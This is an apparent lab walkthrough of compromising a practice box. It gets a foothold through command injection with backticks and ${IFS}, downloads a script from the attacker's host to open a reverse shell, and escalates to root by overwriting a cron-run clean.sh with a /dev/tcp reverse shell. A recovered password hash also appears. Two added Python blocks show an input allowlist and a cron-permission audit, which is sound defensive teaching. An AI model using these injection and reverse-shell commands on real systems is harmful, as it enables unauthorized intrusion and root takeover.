Walkthrough
Gaining a Foothold
Nmap
Quick scan
┌──(kali㉿kali)-[~]
└─$ nmap 10.10.188.225
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-01-13 16:55 EST
Nmap scan report for 10.10.188.225
Host is up (0.27s latency).
Not shown: 998 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Nmap done: 1 IP address (1 host up) scanned in 36.51 seconds

Web Page
10.10.188.225:80


10.10.188.225:80/admin

Burp Suite > Proxy > Repeater
Trying to make it reach out to an external page, but it cannot resolve the name
Try command ls
Search youtube dll
Use backticks for command injection

`ls` > u-admin is not valid
`ls -la` > end of file
`ls%20la` > error
${IFS} > special shell variable (Internal Field Separator)
`ping${IFS}127.0.0.1`
Using wget through the command injection, sent from Burp Suite Repeater
Create a script for the reverse shell and call it script.sh
bash -i >& /dev/tcp/10.8.252.53/8000 0>&1
https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet
`wget${IFS}http://10.8.252.53:7777/script.sh`
We get response OK

`chmod${IFS}777${IFS}script.sh`
Set up a listener on port 7777
It doesn’t like the dot
Run script.sh using the bash command
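Why a filter that only refuses spaces is not a real defence, shown as an added Python example (mine, not the room's or the target application's code): a handler that blocks literal spaces still lets the ${IFS} form through, while an allowlist on the host value plus an argument vector instead of a shell string closes the whole class. The handler names and the sample inputs are constructed for the illustration.

```python
import ipaddress
import re

# Constructed inputs: a legitimate host, and the ${IFS} form from the notes,
# which contains no literal space and so passes a space-only filter.
LEGIT_HOST = "127.0.0.1"
IFS_PAYLOAD = "127.0.0.1${IFS}`ls`"


def space_denylist_allows(user_input):
    """The weak check the target appears to apply: refuse any literal space."""
    return " " not in user_input


def ifs_expanded(user_input):
    """What /bin/sh sees after parameter expansion: ${IFS} becomes whitespace,
    so the command line is split exactly as if a space had been typed."""
    return user_input.replace("${IFS}", " ")


# RFC 1123 hostname: labels of letters, digits and hyphens joined by dots.
HOSTNAME_RE = re.compile(
    r"(?=.{1,253}$)[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?"
    r"(?:\.[A-Za-z0-9](?:[A-Za-z0-9-]{0,61}[A-Za-z0-9])?)*"
)


def is_valid_host(value):
    """Allowlist: an IP literal or a hostname. Anything else, including
    backticks, $, ;, | and ${IFS}, fails to match and is rejected."""
    try:
        ipaddress.ip_address(value)
        return True
    except ValueError:
        return HOSTNAME_RE.fullmatch(value) is not None


def build_ping_argv(host):
    """Argument vector for subprocess.run(argv, shell=False): no shell means
    no expansion or command substitution; the allowlist also keeps
    option-like values (leading '-') away from ping."""
    if not is_valid_host(host):
        raise ValueError("rejected host: %r" % (host,))
    return ["ping", "-c", "1", host]


if __name__ == "__main__":
    for candidate in (LEGIT_HOST, IFS_PAYLOAD):
        print("%-24r space filter: %-5s allowlist: %s" % (
            candidate, space_denylist_allows(candidate), is_valid_host(candidate)))
```

The point of the allowlist is that it describes the one value the feature needs (a host) rather than enumerating characters an attacker might use; the `shell=False` argument vector then means even a mistake in the allowlist cannot turn into command execution.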

Shell

www-data
Not necessarily who we want to be
We can run linpeas, but it doesn't help much
crontab -l
cat /etc/crontab
ps aux > cron is running as root, but we can't see what it is executing
itsmeadmin:$apr1$tbcm2uwv$UP1ylvgp4.zLKxWj8mc6y/

TTY shell

Escalating Privileges
pspy
https://github.com/DominicBreuker/pspy?tab=readme-ov-file
pspy is a command line tool designed to snoop on processes without need for root permissions. It lets you see commands run by other users, cron jobs, etc., as they execute.
wget http://10.8.252.53/pspy64
chmod +x pspy64
./pspy64
After a minute, we see clean.sh being executed by cron > the cron job's script can be overwritten

chmod clean.sh to 777, as we are the owner of the directory it is in

cat clean.sh to see what it does
Modify or append to clean.sh so it connects a reverse shell back to my machine
echo 'bash -i >& /dev/tcp/10.8.252.53/9999 0>&1' > clean.sh

Set up a listener on port 9999 and wait
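A check a defender would run on the box to catch this cron misconfiguration before anyone else does, as an added Python example (mine, not from the room or from pspy): it parses the /etc/crontab format, takes every absolute path a job command refers to, and flags targets that are writable, missing, or owned by the wrong user. The crontab text and the throwaway files it audits are constructed inline; the function and file names are my own.

```python
import os
import shlex
import stat
import tempfile
import textwrap

# Constructed system crontab (not the target's /etc/crontab). {base} is
# filled in with a throwaway directory so the audit runs offline.
SAMPLE_CRONTAB = textwrap.dedent("""\
    SHELL=/bin/sh
    PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
    # m h dom mon dow user command
    * * * * * root {base}/clean.sh
    * * * * * root {base}/missing.sh
    17 * * * * root cd {base} && run-parts --report {base}/cron.hourly
    */5 * * * * root {base}/bin/rotate
""")

WRITE_BITS = stat.S_IWGRP | stat.S_IWOTH


def parse_system_crontab(text):
    """Yield (user, command) for each job in /etc/crontab format: five time
    fields, a user, then the command. Comments and VAR=value lines are skipped."""
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" in line.split()[0]:
            continue
        fields = line.split(None, 6)
        if len(fields) == 7:
            yield fields[5], fields[6]


def check_path(path, user, trusted_uids):
    """Reasons why `path`, run by cron as `user`, could be hijacked by someone
    outside trusted_uids: it is writable, missing, or sits in a writable dir."""
    reasons = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        st = None
        reasons.append("missing target")
    if st is not None:
        if st.st_uid not in trusted_uids:
            reasons.append("owned by untrusted uid")
        if st.st_mode & WRITE_BITS:
            reasons.append("group- or world-writable")
    # A writable parent lets an untrusted user replace a file (or create a
    # missing one); only regular files and missing targets get this check.
    if st is None or stat.S_ISREG(st.st_mode):
        try:
            pst = os.lstat(os.path.dirname(path))
        except FileNotFoundError:
            pst = None
        if pst is not None and (pst.st_uid not in trusted_uids or pst.st_mode & WRITE_BITS):
            reasons.append("parent directory writable by untrusted user")
    return [(path, user, r) for r in reasons]


def audit_cron_targets(crontab_text, trusted_uids=frozenset({0})):
    """Audit every absolute path mentioned in a job command (the script itself
    or a directory handed to run-parts); returns (path, user, reason) tuples."""
    findings = []
    for user, command in parse_system_crontab(crontab_text):
        for token in shlex.split(command):
            if token.startswith("/"):
                findings.extend(check_path(token, user, trusted_uids))
    return findings


def demo():
    """Build a throwaway tree with one world-writable script and one missing
    script, audit the constructed crontab against it, and return the findings
    with paths made relative to the temp root."""
    base = tempfile.mkdtemp(prefix="cron-audit-")
    for d in ("bin", "cron.hourly"):
        os.mkdir(os.path.join(base, d))
        os.chmod(os.path.join(base, d), 0o755)
    for rel, mode in (("clean.sh", 0o777), ("bin/rotate", 0o755)):
        p = os.path.join(base, rel)
        with open(p, "w") as fh:
            fh.write("#!/bin/sh\nexit 0\n")
        os.chmod(p, mode)
    # The temp tree is owned by us rather than root, so trust our own uid too.
    trusted = frozenset({0, os.getuid()})
    findings = audit_cron_targets(SAMPLE_CRONTAB.format(base=base), trusted)
    return sorted((os.path.relpath(p, base), u, r) for p, u, r in findings)


if __name__ == "__main__":
    for path, user, reason in demo():
        print("%-12s %-6s %s" % (path, user, reason))
```

On a real host, feed `audit_cron_targets` the contents of /etc/crontab and the files under /etc/cron.d with the default trusted set of root only; the same check is worth pointing at the scripts inside any run-parts directory it reports, since cron runs those as root as well.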
